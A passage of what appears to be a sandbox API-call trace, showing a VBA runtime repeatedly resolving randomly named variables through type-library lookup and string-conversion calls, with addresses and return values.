out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.108] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.108] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.108] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jDAAQxA", lHashVal=0x1056ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.108] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.108] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.108] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jDAAQxA", lHashVal=0x1056ad, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.108] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6247a, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="jDAAQxA") returned 8 [0069.108] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jDAAQxA", lHashVal=0x1056ad, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.108] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.108] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6247a | out: _Dst=0x67c2d40) returned 0x0 [0069.108] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jDAAQxA") returned 0x105a31 [0069.108] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_jDAAQxA" | out: _Dst="_B_var_jDAAQxA") returned 0x0 [0069.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_jDAAQxA") returned 15 [0069.108] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.109] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jDAAQxA", lHashVal=0x105a31, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.109] IUnknown:Release (This=0x665ba50) returned 0xd [0069.109] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.109] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jDAAQxA", lHashVal=0x105a31, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.109] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.109] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.109] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jDAAQxA", lHashVal=0x105a31, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.109] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.109] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.109] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jDAAQxA", lHashVal=0x105a31, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.109] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.109] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.109] IUnknown:Release (This=0x665ba50) returned 0xd [0069.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b111be, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_jDAAQxA") returned 15 [0069.109] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jDAAQxA", lHashVal=0x105a31, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x51004100000000, pDummy=0x0) returned 0x0 [0069.109] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6247a | out: _Dst=0x144ec0) returned 0x0 [0069.109] ITypeComp:RemoteBind (in: This=0x665ba60, szName="GUAAAA", lHashVal=0x1044c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624f6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GUAAAA") returned 7 [0069.109] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="GUAAAA", lHashVal=0x1044c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624f6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GUAAAA") returned 7 [0069.110] ITypeComp:RemoteBind (in: This=0x665bd30, szName="GUAAAA", lHashVal=0x1044c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="GUAAAA") returned 0x1044c5 [0069.110] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="GUAAAA" | out: _Dst="GUAAAA") returned 0x0 [0069.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="GUAAAA") returned 7 [0069.110] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.110] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="GUAAAA", lHashVal=0x1044c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.110] IUnknown:Release (This=0x665ba50) returned 0xd [0069.110] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.110] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="GUAAAA", lHashVal=0x1044c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.110] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.110] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.110] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="GUAAAA", lHashVal=0x1044c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.110] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.110] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.110] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="GUAAAA", lHashVal=0x1044c5, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.110] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624f6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="GUAAAA") returned 7 [0069.110] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="GUAAAA", lHashVal=0x1044c5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.110] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.110] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a624f6 | out: _Dst=0x67c2d40) returned 0x0 [0069.110] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_GUAAAA") returned 0x10bf6e [0069.110] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_GUAAAA" | out: _Dst="_B_var_GUAAAA") returned 0x0 [0069.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_GUAAAA") returned 14 [0069.110] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.110] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_GUAAAA", lHashVal=0x10bf6e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.110] IUnknown:Release (This=0x665ba50) returned 0xd [0069.110] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.111] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_GUAAAA", lHashVal=0x10bf6e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.111] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.111] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.111] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_GUAAAA", lHashVal=0x10bf6e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.111] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.111] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.111] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_GUAAAA", lHashVal=0x10bf6e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.111] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.111] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.111] IUnknown:Release (This=0x665ba50) returned 0xd [0069.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b111ee, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_GUAAAA") returned 14 [0069.111] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_GUAAAA", lHashVal=0x10bf6e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x47005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.111] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a624f6 | out: _Dst=0x144ec0) returned 0x0 [0069.111] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IUAAADk", lHashVal=0x10480a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6251e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="IUAAADk") returned 8 [0069.111] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IUAAADk", lHashVal=0x10480a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6251e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="IUAAADk") returned 8 [0069.111] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IUAAADk", lHashVal=0x10480a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.111] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IUAAADk") returned 0x10480a [0069.112] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="IUAAADk" | out: _Dst="IUAAADk") returned 0x0 [0069.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="IUAAADk") returned 8 [0069.112] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.112] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="IUAAADk", lHashVal=0x10480a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.112] IUnknown:Release (This=0x665ba50) returned 0xd [0069.112] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.112] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="IUAAADk", lHashVal=0x10480a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.112] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.112] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.112] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="IUAAADk", lHashVal=0x10480a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.112] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.112] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.112] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="IUAAADk", lHashVal=0x10480a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.112] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6251e, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="IUAAADk") returned 8 [0069.112] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IUAAADk", lHashVal=0x10480a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.112] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.112] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a6251e | out: _Dst=0x67c2d40) returned 0x0 [0069.112] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_IUAAADk") returned 0x103c0d [0069.112] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_IUAAADk" | out: _Dst="_B_var_IUAAADk") returned 0x0 [0069.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_IUAAADk") returned 15 [0069.112] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.112] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_IUAAADk", lHashVal=0x103c0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.112] IUnknown:Release (This=0x665ba50) returned 0xd [0069.112] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.112] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_IUAAADk", lHashVal=0x103c0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.112] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.112] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.112] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_IUAAADk", lHashVal=0x103c0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.113] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.113] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.113] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_IUAAADk", lHashVal=0x103c0d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.113] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.113] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.113] IUnknown:Release (This=0x665ba50) returned 0xd [0069.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1121e, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_IUAAADk") returned 15 [0069.113] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IUAAADk", lHashVal=0x103c0d, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x49005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.113] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a6251e | out: _Dst=0x144ec0) returned 0x0 [0069.113] ITypeComp:RemoteBind (in: This=0x665ba60, szName="tAA4UB", lHashVal=0x10c314, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62546, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAA4UB") returned 7 [0069.113] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="tAA4UB", lHashVal=0x10c314, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62546, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAA4UB") returned 7 [0069.113] ITypeComp:RemoteBind (in: This=0x665bd30, szName="tAA4UB", lHashVal=0x10c314, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.113] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="tAA4UB") returned 0x10c314 [0069.113] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="tAA4UB" | out: _Dst="tAA4UB") returned 0x0 [0069.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="tAA4UB") returned 7 [0069.113] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.113] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="tAA4UB", lHashVal=0x10c314, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.113] IUnknown:Release (This=0x665ba50) returned 0xd [0069.113] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.113] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="tAA4UB", lHashVal=0x10c314, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.114] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.114] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.114] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="tAA4UB", lHashVal=0x10c314, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.114] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.114] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.114] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="tAA4UB", lHashVal=0x10c314, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.114] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62546, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="tAA4UB") returned 7 [0069.114] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="tAA4UB", lHashVal=0x10c314, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.114] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.114] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a62546 | out: _Dst=0x67c2d40) returned 0x0 [0069.114] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_tAA4UB") returned 0x103d7e [0069.114] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_tAA4UB" | out: _Dst="_B_var_tAA4UB") returned 0x0 [0069.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_tAA4UB") returned 14 [0069.114] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.114] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_tAA4UB", lHashVal=0x103d7e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.114] IUnknown:Release (This=0x665ba50) returned 0xd [0069.114] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.114] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_tAA4UB", lHashVal=0x103d7e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.114] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.114] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.114] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_tAA4UB", lHashVal=0x103d7e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.114] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.114] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.114] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_tAA4UB", lHashVal=0x103d7e, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.114] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.114] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.115] IUnknown:Release (This=0x665ba50) returned 0xd [0069.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1124e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_tAA4UB") returned 14 [0069.115] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_tAA4UB", lHashVal=0x103d7e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x55003400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x74005f00720061, ppTypeComp=0x55003400000000, pDummy=0x0) returned 0x0 [0069.115] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a62546 | out: _Dst=0x144ec0) returned 0x0 [0069.115] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aBw1Ac", lHashVal=0x10ca21, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6256e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aBw1Ac") returned 7 [0069.115] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aBw1Ac", lHashVal=0x10ca21, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6256e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | 